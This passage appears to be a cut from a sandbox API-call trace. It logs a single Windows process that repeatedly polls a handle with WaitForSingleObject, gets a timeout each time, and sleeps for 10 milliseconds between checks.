(dwMilliseconds=0xa) [0198.823] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.823] Sleep (dwMilliseconds=0xa) [0199.055] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.055] Sleep (dwMilliseconds=0xa) [0199.141] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.141] Sleep (dwMilliseconds=0xa) [0199.257] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.257] Sleep (dwMilliseconds=0xa) [0199.305] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.305] Sleep (dwMilliseconds=0xa) [0199.369] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.369] Sleep (dwMilliseconds=0xa) [0199.476] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.476] Sleep (dwMilliseconds=0xa) [0199.537] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.537] Sleep (dwMilliseconds=0xa) [0199.587] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.587] Sleep (dwMilliseconds=0xa) [0199.746] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.747] Sleep (dwMilliseconds=0xa) [0199.794] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.794] Sleep (dwMilliseconds=0xa) [0199.851] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.851] Sleep (dwMilliseconds=0xa) [0199.962] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0199.962] Sleep (dwMilliseconds=0xa) [0200.011] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.012] Sleep (dwMilliseconds=0xa) [0200.061] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.061] Sleep (dwMilliseconds=0xa) [0200.099] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.099] Sleep (dwMilliseconds=0xa) [0200.165] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.165] Sleep (dwMilliseconds=0xa) [0200.213] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.213] Sleep (dwMilliseconds=0xa) [0200.304] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.304] Sleep (dwMilliseconds=0xa) [0200.379] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.379] Sleep (dwMilliseconds=0xa) [0200.432] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.432] Sleep (dwMilliseconds=0xa) [0200.471] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.471] Sleep (dwMilliseconds=0xa) [0200.512] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.512] Sleep (dwMilliseconds=0xa) [0200.568] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.568] Sleep (dwMilliseconds=0xa) [0200.635] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.635] Sleep (dwMilliseconds=0xa) [0200.761] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.761] Sleep (dwMilliseconds=0xa) [0200.792] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.792] Sleep (dwMilliseconds=0xa) [0200.828] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0200.828] Sleep (dwMilliseconds=0xa) [0201.058] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.058] Sleep (dwMilliseconds=0xa) [0201.203] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.203] Sleep (dwMilliseconds=0xa) [0201.320] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.320] Sleep (dwMilliseconds=0xa) [0201.457] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.457] Sleep (dwMilliseconds=0xa) [0201.584] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.584] Sleep (dwMilliseconds=0xa) [0201.669] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.669] Sleep (dwMilliseconds=0xa) [0201.723] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.723] Sleep (dwMilliseconds=0xa) [0201.764] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.764] Sleep (dwMilliseconds=0xa) [0201.808] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.808] Sleep (dwMilliseconds=0xa) [0201.860] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.860] Sleep (dwMilliseconds=0xa) [0201.972] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0201.972] Sleep (dwMilliseconds=0xa) [0202.027] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.027] Sleep (dwMilliseconds=0xa) [0202.067] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.067] Sleep (dwMilliseconds=0xa) [0202.120] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.120] Sleep (dwMilliseconds=0xa) [0202.282] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.300] Sleep (dwMilliseconds=0xa) [0202.380] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.380] Sleep (dwMilliseconds=0xa) [0202.462] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.462] Sleep (dwMilliseconds=0xa) [0202.519] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.519] Sleep (dwMilliseconds=0xa) [0202.565] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.565] Sleep (dwMilliseconds=0xa) [0202.623] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.624] Sleep (dwMilliseconds=0xa) [0202.682] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.682] Sleep (dwMilliseconds=0xa) [0202.729] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.729] Sleep (dwMilliseconds=0xa) [0202.768] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.768] Sleep (dwMilliseconds=0xa) [0202.808] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.809] Sleep (dwMilliseconds=0xa) [0202.882] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0202.882] Sleep (dwMilliseconds=0xa) [0203.001] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.001] Sleep (dwMilliseconds=0xa) [0203.047] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.047] Sleep (dwMilliseconds=0xa) [0203.086] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.086] Sleep (dwMilliseconds=0xa) [0203.162] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.162] Sleep (dwMilliseconds=0xa) [0203.312] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.312] Sleep (dwMilliseconds=0xa) [0203.406] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.406] Sleep (dwMilliseconds=0xa) [0203.486] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.487] Sleep (dwMilliseconds=0xa) [0203.566] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.566] Sleep (dwMilliseconds=0xa) [0203.647] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.648] Sleep (dwMilliseconds=0xa) [0203.766] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.766] Sleep (dwMilliseconds=0xa) [0203.848] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0203.848] Sleep (dwMilliseconds=0xa) [0204.205] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.206] Sleep (dwMilliseconds=0xa) [0204.298] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.298] Sleep (dwMilliseconds=0xa) [0204.419] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.419] Sleep (dwMilliseconds=0xa) [0204.512] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.512] Sleep (dwMilliseconds=0xa) [0204.643] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.643] Sleep (dwMilliseconds=0xa) [0204.736] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.736] Sleep (dwMilliseconds=0xa) [0204.838] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.838] Sleep (dwMilliseconds=0xa) [0204.965] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0204.965] Sleep (dwMilliseconds=0xa) [0205.061] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.061] Sleep (dwMilliseconds=0xa) [0205.155] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.155] Sleep (dwMilliseconds=0xa) [0205.231] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.231] Sleep (dwMilliseconds=0xa) [0205.331] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.331] Sleep (dwMilliseconds=0xa) [0205.480] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.480] Sleep (dwMilliseconds=0xa) [0205.614] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.614] Sleep (dwMilliseconds=0xa) [0205.826] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.826] Sleep (dwMilliseconds=0xa) [0205.907] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0205.907] Sleep (dwMilliseconds=0xa) [0206.207] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.207] Sleep (dwMilliseconds=0xa) [0206.324] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.324] Sleep (dwMilliseconds=0xa) [0206.448] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.448] Sleep (dwMilliseconds=0xa) [0206.555] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.555] Sleep (dwMilliseconds=0xa) [0206.680] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.680] Sleep (dwMilliseconds=0xa) [0206.759] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.760] Sleep (dwMilliseconds=0xa) [0206.886] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0206.886] Sleep (dwMilliseconds=0xa) [0207.102] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.102] Sleep (dwMilliseconds=0xa) [0207.266] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.266] Sleep (dwMilliseconds=0xa) [0207.365] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.365] Sleep (dwMilliseconds=0xa) [0207.443] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.444] Sleep (dwMilliseconds=0xa) [0207.599] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.599] Sleep (dwMilliseconds=0xa) [0207.680] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.680] Sleep (dwMilliseconds=0xa) [0207.779] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.779] Sleep (dwMilliseconds=0xa) [0207.891] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0207.891] Sleep (dwMilliseconds=0xa) [0208.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.018] Sleep (dwMilliseconds=0xa) [0208.100] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.100] Sleep (dwMilliseconds=0xa) [0208.223] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.223] Sleep (dwMilliseconds=0xa) [0208.364] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.364] Sleep (dwMilliseconds=0xa) [0208.458] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.458] Sleep (dwMilliseconds=0xa) [0208.587] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.587] Sleep (dwMilliseconds=0xa) [0208.718] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.718] Sleep (dwMilliseconds=0xa) [0208.841] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.841] Sleep (dwMilliseconds=0xa) [0208.919] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0208.919] Sleep (dwMilliseconds=0xa) [0209.071] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.071] Sleep (dwMilliseconds=0xa) [0209.167] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.167] Sleep (dwMilliseconds=0xa) [0209.481] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.481] Sleep (dwMilliseconds=0xa) [0209.581] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.581] Sleep (dwMilliseconds=0xa) [0209.663] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.663] Sleep (dwMilliseconds=0xa) [0209.782] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.782] Sleep (dwMilliseconds=0xa) [0209.894] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.895] Sleep (dwMilliseconds=0xa) [0209.952] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0209.952] Sleep (dwMilliseconds=0xa) [0210.055] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.055] Sleep (dwMilliseconds=0xa) [0210.178] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.178] Sleep (dwMilliseconds=0xa) [0210.323] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.323] Sleep (dwMilliseconds=0xa) [0210.416] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.416] Sleep (dwMilliseconds=0xa) [0210.493] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.493] Sleep (dwMilliseconds=0xa) [0210.635] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.636] Sleep (dwMilliseconds=0xa) [0210.747] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.747] Sleep (dwMilliseconds=0xa) [0210.831] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.831] Sleep (dwMilliseconds=0xa) [0210.964] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0210.964] Sleep (dwMilliseconds=0xa) [0211.077] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.077] Sleep (dwMilliseconds=0xa) [0211.165] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.165] Sleep (dwMilliseconds=0xa) [0211.317] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.317] Sleep (dwMilliseconds=0xa) [0211.461] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.461] Sleep (dwMilliseconds=0xa) [0211.539] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.539] Sleep (dwMilliseconds=0xa) [0211.622] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.623] Sleep (dwMilliseconds=0xa) [0211.693] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.693] Sleep (dwMilliseconds=0xa) [0211.830] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.830] Sleep (dwMilliseconds=0xa) [0211.914] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.914] Sleep (dwMilliseconds=0xa) [0211.970] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0211.971] Sleep (dwMilliseconds=0xa) [0212.153] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.154] Sleep (dwMilliseconds=0xa) [0212.199] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.199] Sleep (dwMilliseconds=0xa) [0212.359] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.359] Sleep (dwMilliseconds=0xa) [0212.449] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.449] Sleep (dwMilliseconds=0xa) [0212.493] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.493] Sleep (dwMilliseconds=0xa) [0212.534] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.534] Sleep (dwMilliseconds=0xa) [0212.593] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.593] Sleep (dwMilliseconds=0xa) [0212.635] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0212.635] Sleep (dwMilliseconds=0xa) [0213.674] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0213.674] Sleep (dwMilliseconds=0xa) [0213.759] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0213.759] Sleep (dwMilliseconds=0xa) [0213.868] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0213.869] Sleep (dwMilliseconds=0xa) [0214.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0214.018] Sleep (dwMilliseconds=0xa) [0214.144] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0214.145] Sleep (dwMilliseconds=0xa) [0214.746] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0214.746] Sleep (dwMilliseconds=0xa) [0214.870] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0214.871] Sleep (dwMilliseconds=0xa) [0214.996] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0214.996] Sleep (dwMilliseconds=0xa) [0215.173] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.173] Sleep (dwMilliseconds=0xa) [0215.243] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.244] Sleep (dwMilliseconds=0xa) [0215.375] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.375] Sleep (dwMilliseconds=0xa) [0215.474] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.474] Sleep (dwMilliseconds=0xa) [0215.517] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.517] Sleep (dwMilliseconds=0xa) [0215.566] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.566] Sleep (dwMilliseconds=0xa) [0215.612] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.612] Sleep (dwMilliseconds=0xa) [0215.733] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.733] Sleep (dwMilliseconds=0xa) [0215.813] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.813] Sleep (dwMilliseconds=0xa) [0215.909] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0215.909] Sleep (dwMilliseconds=0xa) [0216.039] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.039] Sleep (dwMilliseconds=0xa) [0216.205] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.205] Sleep (dwMilliseconds=0xa) [0216.316] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.316] Sleep (dwMilliseconds=0xa) [0216.384] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.384] Sleep (dwMilliseconds=0xa) [0216.513] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.513] Sleep (dwMilliseconds=0xa) [0216.589] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.590] Sleep (dwMilliseconds=0xa) [0216.686] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.686] Sleep (dwMilliseconds=0xa) [0216.808] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.808] Sleep (dwMilliseconds=0xa) [0216.924] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0216.924] Sleep (dwMilliseconds=0xa) [0217.023] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.023] Sleep (dwMilliseconds=0xa) [0217.206] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.206] Sleep (dwMilliseconds=0xa) [0217.275] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.275] Sleep (dwMilliseconds=0xa) [0217.337] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.337] Sleep (dwMilliseconds=0xa) [0217.384] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.384] Sleep (dwMilliseconds=0xa) [0217.425] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.425] Sleep (dwMilliseconds=0xa) [0217.473] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.473] Sleep (dwMilliseconds=0xa) [0217.508] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.508] Sleep (dwMilliseconds=0xa) [0217.540] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.541] Sleep (dwMilliseconds=0xa) [0217.613] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0217.613] Sleep (dwMilliseconds=0xa) [0219.682] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0219.683] Sleep (dwMilliseconds=0xa) [0219.847] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0219.847] Sleep (dwMilliseconds=0xa) [0219.957] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0219.957] Sleep (dwMilliseconds=0xa) [0220.055] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.055] Sleep (dwMilliseconds=0xa) [0220.310] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.310] Sleep (dwMilliseconds=0xa) [0220.390] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.390] Sleep (dwMilliseconds=0xa) [0220.461] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.461] Sleep (dwMilliseconds=0xa) [0220.576] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.576] Sleep (dwMilliseconds=0xa) [0220.776] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.776] Sleep (dwMilliseconds=0xa) [0220.902] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0220.902] Sleep (dwMilliseconds=0xa) [0221.061] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0221.061] Sleep (dwMilliseconds=0xa) [0221.393] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0221.394] Sleep (dwMilliseconds=0xa) [0221.559] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0221.559] Sleep (dwMilliseconds=0xa) [0221.862] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0221.862] Sleep (dwMilliseconds=0xa) [0221.989] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0221.989] Sleep (dwMilliseconds=0xa) [0222.173] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.173] Sleep (dwMilliseconds=0xa) [0222.274] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.274] Sleep (dwMilliseconds=0xa) [0222.427] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.428] Sleep (dwMilliseconds=0xa) [0222.592] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.593] Sleep (dwMilliseconds=0xa) [0222.670] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.670] Sleep (dwMilliseconds=0xa) [0222.743] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.743] Sleep (dwMilliseconds=0xa) [0222.792] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.792] Sleep (dwMilliseconds=0xa) [0222.860] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.860] Sleep (dwMilliseconds=0xa) [0222.914] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.914] Sleep (dwMilliseconds=0xa) [0222.991] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0222.991] Sleep (dwMilliseconds=0xa) [0223.065] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.066] Sleep (dwMilliseconds=0xa) [0223.242] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.242] Sleep (dwMilliseconds=0xa) [0223.318] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.319] Sleep (dwMilliseconds=0xa) [0223.364] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.364] Sleep (dwMilliseconds=0xa) [0223.439] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.439] Sleep (dwMilliseconds=0xa) [0223.552] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.552] Sleep (dwMilliseconds=0xa) [0223.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.789] Sleep (dwMilliseconds=0xa) [0223.906] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0223.906] Sleep (dwMilliseconds=0xa) [0224.008] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0224.008] Sleep (dwMilliseconds=0xa) [0224.199] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0224.200] Sleep (dwMilliseconds=0xa) [0224.329] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0224.329] Sleep (dwMilliseconds=0xa) [0224.464] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0224.464] Sleep (dwMilliseconds=0xa) [0225.045] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.045] Sleep (dwMilliseconds=0xa) [0225.193] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.193] Sleep (dwMilliseconds=0xa) [0225.254] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.254] Sleep (dwMilliseconds=0xa) [0225.327] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.327] Sleep (dwMilliseconds=0xa) [0225.433] 